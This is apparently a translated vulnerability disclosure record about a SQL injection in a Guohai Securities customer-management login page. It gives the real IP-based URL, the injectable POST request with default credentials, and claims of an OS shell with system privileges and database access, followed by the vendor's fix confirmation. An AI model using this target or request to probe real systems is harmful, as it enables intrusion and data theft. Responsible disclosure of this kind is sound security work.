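2015-09-21: Details reported to the vendor; awaiting vendor handling
2015-09-21: Vendor confirmed; details disclosed only to the vendor
2015-10-01: Details disclosed to core white hats and experts in related fields
2015-10-09: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public
Can lead to the leak of 11 databases and a large amount of information
Guohai Securities (国海证券) customer management: http://58.60.191.91:88/index.asp
POST injection: http://58.60.191.91:88/index.asp (POST)
userid=admin&password=123456&Submit=%B5%C7%C2%BC
os-shell can be executed, with system privileges
A look at the large amount of table information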
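Most machines on the internal network can be penetrated further
Filtering
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2015-09-21 14:04
This system is an old business system and is about to be taken offline
2015-09-25: Vulnerability fix completed
2015-10-09: The vulnerability has been fixed, thank you!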